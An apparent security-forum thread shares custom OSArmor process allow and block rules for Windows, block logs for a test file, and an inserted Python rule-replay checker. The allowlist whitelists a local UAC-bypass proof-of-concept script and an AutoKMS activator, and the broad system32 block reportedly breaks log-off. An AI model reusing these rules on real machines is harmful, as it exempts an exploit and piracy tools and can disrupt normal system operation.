    Can anybody help me with these rules, or should I just wait for the next test? I'm scared of fxcxing up my computer with these security policies. Most people on Wilders Security said it doesn't block exploits or it's not anti-exploit software, but they're very wrong: it's killing exploits by the process, not via code injection etc. Kill the executable file and the DLL file will fail to load in memory.

    Security fix for Windows folder and system32 folder done!
    Code:
    // Allow all safe Windows executable files
    [%PROCESS%: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe] [%PROCESSFILEPATH%: C:\Windows\System32\WindowsPowerShell\v1.0\] [%PROCESSCMDLINE%: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe" "C:\Users\BlackBox\Desktop\New Projects\UAC_Bypass_Exploit_3\POC.ps1"] [%PARENTPROCESS%: C:\Windows\explorer.exe] [%PARENTFILEPATH%: C:\Windows\]
    [%PROCESS%: C:\Windows\explorer.exe] [%PROCESSFILEPATH%: C:\Windows\] [%PROCESSCMDLINE%: "C:\Windows\explorer.exe"] [%PARENTPROCESS%: C:\Windows\explorer.exe] [%PARENTFILEPATH%: C:\Windows\]
    [%PROCESS%: C:\Windows\regedit.exe] [%PROCESSFILEPATH%: C:\Windows\] [%PROCESSCMDLINE%: "C:\Windows\regedit.exe"] [%PARENTPROCESS%: C:\Windows\explorer.exe] [%PARENTFILEPATH%: C:\Windows\]
    [%PROCESS%: C:\Windows\explorer.exe] [%PROCESSFILEPATH%: C:\Windows\] [%PROCESSCMDLINE%: "C:\Windows\explorer.exe"] [%PARENTPROCESS%: C:\Windows\System32\taskmgr.exe] [%PARENTFILEPATH%: C:\Windows\System32\]
    [%PROCESS%: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe] [%PROCESSFILEPATH%: C:\Windows\Microsoft.NET\Framework\v2.0.50727\] [%PROCESSCMDLINE%: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\oasrnxnk.cmdline"] [%FILESIGNER%: Microsoft Corporation] [%PARENTPROCESS%: C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe] [%PARENTFILEPATH%: C:\Program Files\Intel\Intel(R) Rapid Storage Technology\] [%PARENTSIGNER%: Intel Corporation]
    [%PROCESS%: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe] [%PROCESSFILEPATH%: C:\Windows\Microsoft.NET\Framework\v2.0.50727\] [%PROCESSCMDLINE%: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 1688 DefaultKMSPID KillProcessOnPort] [%FILESIGNER%: Microsoft Corporation] [%PARENTPROCESS%: C:\Windows\AutoKMS\AutoKMS.exe] [%PARENTFILEPATH%: C:\Windows\AutoKMS\]
    [%PROCESS%: C:\Program Files\Microsoft Office\Office14\BCSSync.exe] [%PROCESSFILEPATH%: C:\Program Files\Microsoft Office\Office14\] [%PROCESSCMDLINE%: "C:\Program Files\Microsoft Office\Office14\BCSSync.exe" /DelayServices] [%FILESIGNER%: Microsoft Corporation] [%PARENTPROCESS%: C:\Windows\explorer.exe] [%PARENTFILEPATH%: C:\Windows\]
    
    // Allow all safe system32 executable files
    [%FILESIGNER%: Microsoft Windows] [%PROCESS%: *.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PARENTFILEPATH%: C:\Windows\System32\]
    [%FILESIGNER%: Intel Corporation] [%PROCESS%: *.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PARENTFILEPATH%: C:\Windows\System32\]
    [%PROCESS%: *DllHost.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PARENTFILEPATH%: C:\Windows\System32\]
    [%PROCESS%: *conhost.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PARENTFILEPATH%: C:\Windows\System32\]
    [%PROCESS%: C:\Windows\System32\wininit.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: "C:\Windows\System32\wininit.exe"] [%PARENTPROCESS%: C:\Windows\explorer.exe] [%PARENTFILEPATH%: C:\Windows\]
    [%PROCESS%: C:\Windows\System32\notepad.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: "C:\Windows\system32\notepad.exe" C:\Program Files\NoVirusThanks\OSArmorDevSvc\Exclusions.db] [%PARENTPROCESS%: C:\Program Files\NoVirusThanks\OSArmorDevSvc\OSArmorExcHlp.exe] [%PARENTFILEPATH%: C:\Program Files\NoVirusThanks\OSArmorDevSvc\] [%PARENTSIGNER%: NoVirusThanks Company Srl]
    [%PROCESS%: C:\Windows\System32\svchost.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: "C:\Windows\System32\svchost.exe"] [%PARENTPROCESS%: C:\Windows\explorer.exe] [%PARENTFILEPATH%: C:\Windows\]
    [%PROCESS%: C:\Windows\System32\cmd.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: "C:\Windows\system32\cmd.exe"] [%PARENTPROCESS%: C:\Windows\explorer.exe] [%PARENTFILEPATH%: C:\Windows\]
    [%PROCESS%: C:\Windows\System32\shutdown.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: "C:\Windows\system32\shutdown.exe"] [%PARENTPROCESS%: C:\Windows\explorer.exe] [%PARENTFILEPATH%: C:\Windows\]
    [%PROCESS%: C:\Windows\System32\UserAccountControlSettings.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: "C:\Windows\system32\UserAccountControlSettings.exe"] [%PARENTPROCESS%: C:\Windows\explorer.exe] [%PARENTFILEPATH%: C:\Windows\]
    [%PROCESS%: C:\Windows\System32\WmiPrvSE.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PARENTPROCESS%: C:\Windows\explorer.exe] [%PARENTFILEPATH%: C:\Windows\]
    [%PROCESS%: C:\Windows\System32\winlogon.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: "C:\Windows\System32\winlogon.exe"] [%PARENTPROCESS%: C:\Windows\explorer.exe] [%PARENTFILEPATH%: C:\Windows\]
    [%PROCESS%: C:\Windows\System32\igfxpers.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: "C:\Windows\System32\igfxpers.exe"] [%FILESIGNER%: Intel Corporation] [%PARENTPROCESS%: C:\Windows\explorer.exe] [%PARENTFILEPATH%: C:\Windows\]
    [%PROCESS%: C:\Windows\System32\taskhost.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: "C:\Windows\System32\taskhost.exe"] [%PARENTPROCESS%: C:\Windows\explorer.exe] [%PARENTFILEPATH%: C:\Windows\]
    [%PROCESS%: C:\Windows\System32\SearchIndexer.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: "C:\Windows\System32\SearchIndexer.exe"] [%PARENTPROCESS%: C:\Windows\explorer.exe] [%PARENTFILEPATH%: C:\Windows\]
    [%PROCESS%: C:\Windows\System32\hkcmd.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: "C:\Windows\System32\hkcmd.exe"] [%FILESIGNER%: Intel Corporation] [%PARENTPROCESS%: C:\Windows\explorer.exe] [%PARENTFILEPATH%: C:\Windows\]
    [%PROCESS%: C:\Windows\System32\igfxtray.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: "C:\Windows\System32\igfxtray.exe"] [%FILESIGNER%: Intel Corporation] [%PARENTPROCESS%: C:\Windows\explorer.exe] [%PARENTFILEPATH%: C:\Windows\]
    [%PROCESS%: C:\Windows\System32\LogonUI.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: "LogonUI.exe" /flags:0x0] [%PARENTPROCESS%: C:\Windows\System32\winlogon.exe] [%PARENTFILEPATH%: C:\Windows\System32\]
    [%PROCESS%: C:\Windows\System32\efsui.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: efsui.exe /efs /keybackup] [%PARENTPROCESS%: C:\Windows\System32\lsass.exe] [%PARENTFILEPATH%: C:\Windows\System32\]
    [%PROCESS%: C:\Windows\System32\sppsvc.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: C:\Windows\system32\sppsvc.exe] [%PARENTPROCESS%: C:\Windows\System32\services.exe] [%PARENTFILEPATH%: C:\Windows\System32\]
    [%PROCESS%: C:\Windows\System32\WerFault.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: C:\Windows\system32\WerFault.exe -u -p 1620 -s 988] [%PARENTPROCESS%: C:\Windows\AutoKMS\AutoKMS.exe] [%PARENTFILEPATH%: C:\Windows\AutoKMS\]
    [%PROCESS%: C:\Windows\System32\svchost.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted] [%PARENTPROCESS%: C:\Windows\System32\services.exe] [%PARENTFILEPATH%: C:\Windows\System32\]
    [%PROCESS%: C:\Windows\System32\svchost.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation] [%PARENTPROCESS%: C:\Windows\System32\services.exe] [%PARENTFILEPATH%: C:\Windows\System32\]
    [%PROCESS%: C:\Windows\System32\taskhost.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: taskhost.exe SYSTEM] [%PARENTPROCESS%: C:\Windows\System32\services.exe] [%PARENTFILEPATH%: C:\Windows\System32\]
    [%PROCESS%: C:\Windows\System32\svchost.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: C:\Windows\system32\svchost.exe -k imgsvc] [%PARENTPROCESS%: C:\Windows\System32\services.exe] [%PARENTFILEPATH%: C:\Windows\System32\]
    [%PROCESS%: C:\Windows\System32\svchost.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: C:\Windows\System32\svchost.exe -k LocalServicePeerNet] [%PARENTPROCESS%: C:\Windows\System32\services.exe] [%PARENTFILEPATH%: C:\Windows\System32\]
    [%PROCESS%: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe] [%PROCESSFILEPATH%: C:\Windows\Microsoft.NET\Framework\v2.0.50727\] [%PROCESSCMDLINE%: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\wx6t45xs.cmdline"] [%FILESIGNER%: Microsoft Corporation] [%PARENTPROCESS%: C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe] [%PARENTFILEPATH%: C:\Program Files\Intel\Intel(R) Rapid Storage Technology\] [%PARENTSIGNER%: Intel Corporation]
    [%PROCESS%: C:\Windows\System32\mobsync.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: C:\Windows\System32\mobsync.exe -Embedding] [%PARENTPROCESS%: C:\Windows\System32\svchost.exe] [%PARENTFILEPATH%: C:\Windows\System32\]
    [%PROCESS%: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe] [%PROCESSFILEPATH%: C:\Windows\Microsoft.NET\Framework\v2.0.50727\] [%PROCESSCMDLINE%: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\cp1ve5kj.cmdline"] [%FILESIGNER%: Microsoft Corporation] [%PARENTPROCESS%: C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe] [%PARENTFILEPATH%: C:\Program Files\Intel\Intel(R) Rapid Storage Technology\] [%PARENTSIGNER%: Intel Corporation]
    [%PROCESS%: C:\Windows\System32\SearchIndexer.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: C:\Windows\system32\SearchIndexer.exe /Embedding] [%PARENTPROCESS%: C:\Windows\System32\services.exe] [%PARENTFILEPATH%: C:\Windows\System32\]
    [%PROCESS%: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe] [%PROCESSFILEPATH%: C:\Windows\Microsoft.NET\Framework\v2.0.50727\] [%PROCESSCMDLINE%: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\dulxwqz-.cmdline"] [%FILESIGNER%: Microsoft Corporation] [%PARENTPROCESS%: C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe] [%PARENTFILEPATH%: C:\Program Files\Intel\Intel(R) Rapid Storage Technology\] [%PARENTSIGNER%: Intel Corporation]
    [%PROCESS%: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe] [%PROCESSFILEPATH%: C:\Windows\Microsoft.NET\Framework\v2.0.50727\] [%PROCESSCMDLINE%: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 1688 DefaultKMSPID] [%FILESIGNER%: Microsoft Corporation] [%PARENTPROCESS%: C:\Windows\AutoKMS\AutoKMS.exe] [%PARENTFILEPATH%: C:\Windows\AutoKMS\]
    [%PROCESS%: C:\Windows\System32\SearchProtocolHost.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PARENTPROCESS%: C:\Windows\System32\SearchIndexer.exe] [%PARENTFILEPATH%: C:\Windows\System32\]
    [%PROCESS%: C:\Windows\System32\SearchFilterHost.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: "C:\Windows\system32\SearchFilterHost.exe" 0 520 524 532 65536 528] [%PARENTPROCESS%: C:\Windows\System32\SearchIndexer.exe] [%PARENTFILEPATH%: C:\Windows\System32\]
    [%PROCESS%: C:\Windows\System32\SearchProtocolHost.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: "C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe38_ Global\UsGthrCtrlFltPipeMssGthrPipe38 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"] [%PARENTPROCESS%: C:\Windows\System32\SearchIndexer.exe] [%PARENTFILEPATH%: C:\Windows\System32\]
    [%PROCESS%: C:\Windows\System32\SearchFilterHost.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PARENTPROCESS%: C:\Windows\System32\SearchIndexer.exe] [%PARENTFILEPATH%: C:\Windows\System32\]
    [%PROCESS%: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe] [%PROCESSFILEPATH%: C:\Windows\Microsoft.NET\Framework\v2.0.50727\] [%FILESIGNER%: Microsoft Corporation] [%PARENTPROCESS%: C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe] [%PARENTFILEPATH%: C:\Program Files\Intel\Intel(R) Rapid Storage Technology\] [%PARENTSIGNER%: Intel Corporation]
    [%PROCESS%: C:\Windows\System32\taskmgr.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: "C:\Windows\system32\taskmgr.exe" /4] [%PARENTPROCESS%: C:\Windows\explorer.exe] [%PARENTFILEPATH%: C:\Windows\]
    [%PROCESS%: C:\Windows\System32\rundll32.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding] [%PARENTPROCESS%: C:\Windows\System32\svchost.exe] [%PARENTFILEPATH%: C:\Windows\System32\]
    [%PROCESS%: C:\Windows\System32\rundll32.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PARENTPROCESS%: C:\Windows\System32\svchost.exe] [%PARENTFILEPATH%: C:\Windows\System32\]
    [%PROCESS%: C:\Windows\System32\notepad.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: "C:\Windows\system32\notepad.exe" "C:\Program Files\NoVirusThanks\OSArmorDevSvc\CustomBlock.db"] [%PARENTPROCESS%: C:\Program Files\NoVirusThanks\OSArmorDevSvc\OSArmorDevUI.exe] [%PARENTFILEPATH%: C:\Program Files\NoVirusThanks\OSArmorDevSvc\] [%PARENTSIGNER%: NoVirusThanks Company Srl]
    [%PROCESS%: C:\Windows\System32\notepad.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PARENTPROCESS%: C:\Windows\explorer.exe] [%PARENTFILEPATH%: C:\Windows\]
    [%PROCESS%: C:\Windows\System32\svchost.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: C:\Windows\System32\svchost.exe -k WerSvcGroup] [%PARENTPROCESS%: C:\Windows\System32\services.exe] [%PARENTFILEPATH%: C:\Windows\System32\]
    [%PROCESS%: C:\Windows\System32\taskeng.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PARENTPROCESS%: C:\Windows\System32\svchost.exe] [%PARENTFILEPATH%: C:\Windows\System32\]
    
    Code:
    // Block all executable files only in Windows folder and system32 folder
    [%PROCESS%: *.exe] [%PROCESSFILEPATH%: C:\Windows\]
    [%PROCESS%: *.exe] [%PROCESSFILEPATH%: C:\Windows\system32\]
    
    Log:
    Code:
    Date/Time: 18/01/2018 07:34:15
    Process: [3332]C:\Windows\AntiTest.exe
    Parent: [420]C:\Windows\explorer.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: "C:\Windows\AntiTest.exe"
    Signer:
    Parent Signer:
    
    Date/Time: 18/01/2018 07:34:53
    Process: [1896]C:\Windows\System32\AntiTest.exe
    Parent: [420]C:\Windows\explorer.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: "C:\Windows\System32\AntiTest.exe"
    Signer:
    Parent Signer:
    
    The only problems I now have with OSArmor are that I can restart and shut down the computer, but can't log off the computer. Say if I set a password I would be really stuck lol. I'm using my netbook without a monitor, just software running on the widescreen 23 inch TV instead! All I get is missing input hahaha.
     
    Last edited by a moderator: Jan 18, 2018
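    An added rule checker (not OSArmor's own code) that replays process events in the post's `[%VAR%: value]` format against the two CustomBlock.db rules above, so a rule set can be reviewed against a log before it is deployed. It assumes `*` is a wildcard and that every field named in a rule must match its whole event value case-insensitively; that is a guess at OSArmor's matching semantics, not documented behaviour. The events are the post's two AntiTest entries plus constructed ones.

```python
import re
from fnmatch import fnmatchcase

# Assumed model of the CustomBlock.db syntax seen in the post: one rule per line,
# made of "[%VAR%: value]" tokens; "//" starts a comment line.
TOKEN_RE = re.compile(r"\[%([A-Z]+)%:\s*(.*?)\]")


def parse_tokens(line):
    """Turn a rule or event line into {VAR: value}; comments and blanks give {}."""
    line = line.strip()
    if not line or line.startswith("//"):
        return {}
    return {name: value.strip() for name, value in TOKEN_RE.findall(line)}


def rule_matches(rule, event):
    """Assumption: a rule fires only if every field it names matches the whole
    event value, case-insensitively, with '*' as a glob wildcard. A field the
    event lacks (e.g. no %FILESIGNER% for an unsigned file) never matches."""
    if not rule:
        return False
    for name, pattern in rule.items():
        value = event.get(name)
        if value is None or not fnmatchcase(value.lower(), pattern.lower()):
            return False
    return True


def evaluate(rule_lines, event_lines):
    """Return (process, rule_line) pairs for every event the rule set would block."""
    rules = [(raw.strip(), parse_tokens(raw)) for raw in rule_lines]
    hits = []
    for raw_event in event_lines:
        event = parse_tokens(raw_event)
        for raw_rule, rule in rules:
            if rule_matches(rule, event):
                hits.append((event["PROCESS"], raw_rule))
                break  # first matching rule wins
    return hits


RULES = r"""
// Block all executable files only in Windows folder and system32 folder
[%PROCESS%: *.exe] [%PROCESSFILEPATH%: C:\Windows\]
[%PROCESS%: *.exe] [%PROCESSFILEPATH%: C:\Windows\system32\]
""".splitlines()

# Constructed sample events in the same format (first two mirror the post's log).
EVENTS = r"""
[%PROCESS%: C:\Windows\AntiTest.exe] [%PROCESSFILEPATH%: C:\Windows\] [%PARENTPROCESS%: C:\Windows\explorer.exe] [%PARENTFILEPATH%: C:\Windows\]
[%PROCESS%: C:\Windows\System32\AntiTest.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PARENTPROCESS%: C:\Windows\explorer.exe] [%PARENTFILEPATH%: C:\Windows\]
[%PROCESS%: C:\Windows\System32\notepad.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PARENTPROCESS%: C:\Windows\explorer.exe] [%PARENTFILEPATH%: C:\Windows\]
[%PROCESS%: C:\Windows\SysWOW64\cmd.exe] [%PROCESSFILEPATH%: C:\Windows\SysWOW64\] [%PARENTPROCESS%: C:\Windows\explorer.exe] [%PARENTFILEPATH%: C:\Windows\]
""".splitlines()

if __name__ == "__main__":
    for process, rule in evaluate(RULES, EVENTS):
        print(f"BLOCK {process}  <-  {rule}")
```

    Under these assumptions the rule set blocks both AntiTest copies and also notepad.exe (the system32 rule is broad), while the SysWOW64 event is untouched because the folder rule matches the directory exactly, not its subfolders.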
  25. AeroFit

    AeroFit Registered Member

    Joined:
    Jan 16, 2018
    Posts:
    6
    Location:
    Russia
    @novirusthanks, Test25 is still having the same issue on 2 machines with WinXP SP3 and different hardware.
    Also, it is very much lacking a password protection feature for such functions as "Disable protection" and "Exit GUI".
    And of course, to change any setting I still have to manually navigate to the install folder, Shift + right-click on Configurator, select "Open as..." ...
     
    Last edited: Jan 18, 2018